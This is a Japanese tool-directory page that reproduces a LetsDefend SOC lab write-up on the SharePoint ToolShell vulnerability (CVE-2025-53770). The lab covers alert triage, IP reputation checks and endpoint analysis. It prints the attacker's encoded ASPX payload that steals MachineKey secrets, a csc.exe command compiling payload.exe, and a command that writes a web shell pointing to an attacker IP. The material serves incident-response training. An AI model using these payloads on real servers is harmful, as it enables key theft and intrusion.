Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — CVE-2025-53770 (ToolShell) SharePointのゼロデイ悪用に関する詳細なウォークスルー。これにはRCE分析、MachineKeyの流出、ペイロードのコンパイル、ウェブシェルの展開、インシデント対応の封じ込め手順が含まれます。 | Kitploit
ツール/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
侵害指標 (IOC) 管理脆弱性分析エクスプロイトウェブアプリケーション悪用マルウェア分析デジタルフォレンジックペネトレーションテスト脅威インテリジェンス学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
インシデントレスポンス
ラボと実践
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

CVE-2025-53770 (ToolShell) SharePointのゼロデイ悪用に関する詳細なウォークスルー。これにはRCE分析、MachineKeyの流出、ペイロードのコンパイル、ウェブシェルの展開、インシデント対応の封じ込め手順が含まれます。

リポジトリを見る
141年前未レビュー

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

はじめに

LetsDefendラボで、ToolShell(CVE-2025-53770)と呼ばれるSharePointのゼロデイ脆弱性を調査しました。悪意のあるPOSTリクエストが認証をバイパスし、PowerShellを実行してMachineKeySectionキーを盗み出し、payload.exeをコンパイルし、Webシェル(spinstall0.aspx)を配置する、現実のゼロデイ攻撃を模倣しました。すべての操作をログに記録し、動作を分析し、ホストを隔離しました。このREADMEでは、攻撃プロセス、攻撃を抑制する手順、および学んだ教訓について説明します。

ラボの概要

  • プラットフォーム: LetsDefend Cyber Range
  • ターゲット: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • 目的: RCEの分析、検出と封じ込めの実践

使用したツール:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

アラート

image

これは重大なアラートであり、MS SharePointのToolPane.aspxを標的とした、大規模なペイロードと偽装されたRefererを含む不審なアクティビティです。CVEのコンテキストはCVE-2025-53770に関連しています。これは、特別に細工されたPOSTリクエストを介して認証されていない攻撃者によるSharePointエクスプロイトを可能にする重大な脆弱性です。悪用に成功すると、サーバー上でリモートコード実行(RCE)が発生します。これをアクティブで緊急性の高いものとして扱い、反証が出るまで侵害の可能性を前提としました。

SharePointの簡単な説明

Microsoft SharePointは、エンタープライズ向けのコラボレーションおよびドキュメント管理のためのプラットフォームです。基本的には、ファイル、ワークフロー、内部Webアプリのための安全で整理されたハブです。

主な用途

  • ドキュメント管理: バージョン管理、監査証跡、ファイルのアクセス許可

  • コラボレーション: 複数ユーザーによるドキュメントの共同編集と共有

  • イントラネット/ポータル: 社内ニュース、人事ポリシー、ダッシュボード

  • ワークフローと自動化: フォーム、承認、通知

  • 統合: Teams、Outlook、Officeアプリ、Power BIとの連携

SharePointのセキュリティに関する考慮事項

  • 認証にActive DirectoryまたはSSOを使用

  • 保存時および転送中のデータは暗号化

  • Webパーツやレイアウトは、設定ミスがあると悪用される可能性がある

  • ゼロデイエクスプロイトから防御するには、定期的なパッチ適用が重要

CVE-2025-53770(ToolShell)とは

Microsoft SharePoint Serverにおける重大なゼロデイ脆弱性で、認証なしで攻撃者がリモートからコードを実行できるようにします。安全でないデシリアライゼーションを悪用し、他のSharePointの欠陥(CVE-2025-49704、CVE-2025-49706)と連鎖してシステム全体を乗っ取ることがよくあります。CVSS 9.8(Critical)と評価され、実際に活発に悪用されています。

VirusTotalによる攻撃分析

送信元IPアドレスをVirusTotalで分析しました。 送信元IPアドレス : 107.191.58.76 image

これにより、15/95のセキュリティベンダーがこのIPアドレスを悪意のあるものとしてフラグ付けしていることがわかり、このIPについて多くのことが示されています。

IPの位置情報

次に、IPの位置情報を調べました。これはAbuseIPDBの助けを借りて行われ、以下に示すように、このIPはハッキング、ブルートフォース、Webアプリ攻撃、ポートスキャン、DNSポイズニングで知られています。

image

エンドポイント分析

これを解決するSOCアナリストとして、重要なステップの1つはエンドポイント分析です。エンドポイントセキュリティで「SharePoint01」という名前のホストを検索しました。IPがハッキングで知られているため、さらなる分析を行いました。

image

ホストを見つけた後、ターミナル履歴にアクセスしてコマンドラインを確認しました。

image

| ターミナル履歴 コマンドライン

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

PowerShellフラグ: -nop -w hidden -e

  • -nop = No profile(プロファイルスクリプトを回避)
  • -w hidden = ウィンドウを非表示で起動(ステルス)
  • -e = エンコードされたコマンド

Base64デコーダによるコマンドラインの発見:

ペイロードのため、Base64デコーダに進み、以下に示すようにコマンドをデコードしました。

image

ユーザーはシステムディレクトリ「C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe」からPowerShellを起動し、エンコードされたASP.NETサーバーサイドC#スクリプトのコマンドを実行しました。

  • リフレクションを使用してSystem.Webアセンブリをロードし、
  • 非公開のMachineKeySectionにアクセスし、非公開メソッド(GetApplicationConfig)を呼び出し、
  • WebアプリケーションのMachineKey値(ValidationKey、DecryptionKeyなど)を読み取り、
  • それらのキーをHTTP応答に書き込みます(つまり、外部流出させます)。

ペイロードとポストエクスプロイト活動の取得: / _layouts/15/ToolPane.aspx?...

ペイロードは、ホストのASP.NET MachineKey(認証バイパスやデシリアライゼーショントークンの偽造に使用できる秘密情報)を読み取り、漏洩させようとします。これはToolShellのエクスプロイトパターン(MachineKeyの悪用)と一致します。 コマンド内の主要な侵害指標(IoC)は、Base64デコードとエンコードを使用して確認されました。

  • POST + 大規模ペイロード + このエンコードされたコマンドは、攻撃者がToolShellエクスプロイトパスを介して、そのようなサーバーサイドスクリプトを作成または実行しようとしたことを示しています。
  • Machineの露出とアラートがトリガーされました: -encodedCommand + 非表示ウィンドウ + base64ペイロードの使用は、回避と自動化されたエクスプロイトを示しています。攻撃者は、ペイロードを隠し、コマンドラインログのパターンによる検出を回避するために、-encodedCommandを頻繁に使用します。これにより、攻撃者は悪意のあるViewStateまたはシリアル化されたペイロードを作成し、アプリケーションがそれらを有効として受け入れるようになり、脆弱なSharePointインスタンス上で認証バイパスとリモートコード実行が可能になります。ToolShell(CVE-2025-53770)の場合、これがまさにエクスプロイトの連鎖です。

CMD実行とエクスプロイト

攻撃者はプライベート設定にアクセスし、悪用を試みようとし、.NETを悪用しました。Base64デコーダから、System.Web.Configuration.MachineKeySectionとGetApplicationConfigが見えます。MachineKeySectionには以下が含まれます。

  • マシン/アプリのValidationKey
  • マシン/アプリのDecryptionKey。

これらのキーは、ビューステートとフォーム認証を保護するために使用される秘密情報です。それらを取得することは、シリアル化されたASP.NETペイロードを偽造/検証できるようにするための材料を直接入手する試みであり、デシリアライゼーションベースのRCEの直接の前提条件です。

CMDコマンドの発見:

上記からわずか3秒後、攻撃者は別のコマンドを送信しました。

image

| ターミナル履歴 コマンドライン

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

発見事項

  • コマンドは、.NETフレームワークに付属するC#コンパイラ(csc.exe)を示しています。その役割は、ソースコード(.csファイル)を取得し、通常は.exeまたは.dllの.NETアセンブリにコンパイルすることです。
  • 攻撃者は、被害者のホスト上にC#ソースファイル(payload.cs)をアップロードまたは作成し、組み込みの.NETコンパイラ(csc.exe)を使用してWindows実行可能ファイル(payload.exe)にコンパイルしました。このペイロードはマルウェアである可能性があります。

別のCMDコマンドの発見:

上記からわずか2秒後、攻撃者は別のコマンドを送信しました。

image

| ターミナル履歴 コマンドライン

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

発見事項

  • 攻撃者はcmd.exeを使用して、そのパスにHTMLフォーム/オブジェクトをエコーすることで、SharePointのLAYOUTSディレクトリ内に新しいASPXファイル(spinstall0.aspx)を作成しました。
  • 注入されたASPXには、タグにUrl="http://107.191.58.76/payload.exe"が含まれており、サーバーまたは訪問者をそのリモートペイロードにリダイレクトします。
  • ファイルを...\TEMPLATE\LAYOUTS\の下に配置することで、SharePoint Webアプリケーションを介してアクセス可能になります(永続的なWebアクセス可能なバックドア/ドロッパー)。
  • これは、攻撃者制御のホスト(107.191.58.76)からのペイロード.exeのリモート配信/実行の試みを示しており、侵害と持続性の脅威の明確な兆候です。
  • 別のCMDコマンドの発見:

    上記からわずか5秒後、攻撃者は別のコマンドを送信しました。

    image
ツールをダウンロード